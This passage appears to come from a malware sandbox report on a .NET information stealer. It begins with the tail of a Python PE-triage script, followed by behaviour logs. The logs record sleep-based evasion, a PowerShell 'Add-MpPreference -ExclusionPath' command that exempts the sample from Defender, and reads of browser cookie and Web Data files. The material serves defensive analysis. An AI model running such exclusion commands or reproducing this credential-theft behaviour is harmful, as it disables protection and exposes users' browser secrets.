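    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                      # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, 0x0102)  # i386, 1 section, PE32 opt header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)    # PE32 magic
    struct.pack_into("<H", opt, 70, 0x8540)  # DYNAMIC_BASE | NX_COMPAT | NO_SEH | TERMINAL_SERVER_AWARE
    struct.pack_into("<I", opt, 92, 16)      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_DEBUG, 0x2000, 0x1C)
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2040, 0x48)
    payload = bytes(range(256)) * 4          # constructed: every byte value equally often, i.e. 8.0 bits/byte
    section = struct.pack("<8sIIIIIIHHI", b".text", len(payload), 0x2000, len(payload), 512,
                          0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + bytes(opt) + section
    return headers + b"\0" * (512 - len(headers)) + payload


if __name__ == "__main__":
    import json
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    print(json.dumps(triage_pe(blob), indent=2))
```

Run it as `python triage.py VbcXXnmIwPPhh.exe` to get the JSON; with no argument it triages the constructed sample. A future-dated timestamp together with a CLR header and a near-8.0 .text section is the combination that, in this report, corresponds to a .NET loader carrying an encrypted second stage that it later hands to Assembly.Load(byte[]).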

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (40 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (97 identical entries)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (53 identical entries)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 3040000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 3270000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 31C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 7F50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 8F50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 9100000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: A100000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 1680000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 31B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 2FF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599780
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599671
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599560
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599218
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597796
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597687
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597577
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597468
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597359
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597250
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597140
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597031
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596921
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596812
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596590
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596468
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596359
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596234
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596125
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596015
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595906
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595796
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595672
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595562
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595453
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595343
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595218
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595109
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595000
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594865
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594750
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594640
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594531
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6282
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3283
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window / User API: threadDelayed 1672
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window / User API: threadDelayed 8189
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window / User API: foregroundWindowGot 1735
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 3500 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4512 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599780s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599560s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597796s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597577s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596921s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596590s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596468s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596359s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595796s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595343s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595218s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595109s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595000s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594865s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594750s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594640s >= -30000s
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594531s >= -30000s
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3726403928.0000000006A40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9548 LdrInitializeThunk,LdrInitializeThunk, 6_2_06DF9548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager,q
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerPr
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerx
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe VolumeInformation
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
